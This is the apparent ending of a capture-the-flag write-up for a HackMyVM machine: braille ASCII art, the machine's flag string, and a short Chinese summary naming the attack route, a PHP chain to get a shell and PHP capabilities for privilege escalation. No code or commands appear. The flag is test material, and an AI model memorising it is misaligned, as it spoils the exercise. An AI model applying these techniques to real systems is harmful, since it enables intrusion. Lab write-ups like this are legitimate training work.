⠀⠘⠻⢷⣶⣦⣶⣿⣿⣿⣿⣛⣛⡛⡻⢟⠿⠻⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⠿⣿⠿⣿⣗⠀⠀⠈⠿⢛⢩⢏⡉⣉⣉⢉⣍⣙⣿⠿⠛⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣿⠀⠀⠀⠈⠿⣾⡇⣸⣡⣿⣷⠟⠛⠛⠉⠉⠉⠉⠉⠉⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠉⠉⠉⠉⠉⠉⠉⠁⠀⠀⠀⠀⠀
⠀⢠⠀⠀⠀⠀⠉⠉⠉⠉⠙⠻⠿⢿⣽⣿⣿⣿⣿⣿⣿⡿⠖⠳⠶⠶⠶⠿⠿⠶⠶⠼⠿⠿⠿⠿⠿⠿⠿⠿⠿⠽⠯⠿⠿⠿⠶⠶⠶⠶⠶⠚⠚⠛⠛⠛⠛⠛⠛⠛⠛⠛⠻⣆⡀⠀⠀⠀⠉⠙⢻⣭⡿⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⢀⠀⠀⠀⠀⠀⠀⠀⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⢀⠀⡀⡀⢀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠘⡛⠲⠶⢶⣶⣾⣿⣋⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀HMV{This-was-a-Quick-AND-fast-machine}

总结:1.php链getshell

2.php capabilities提权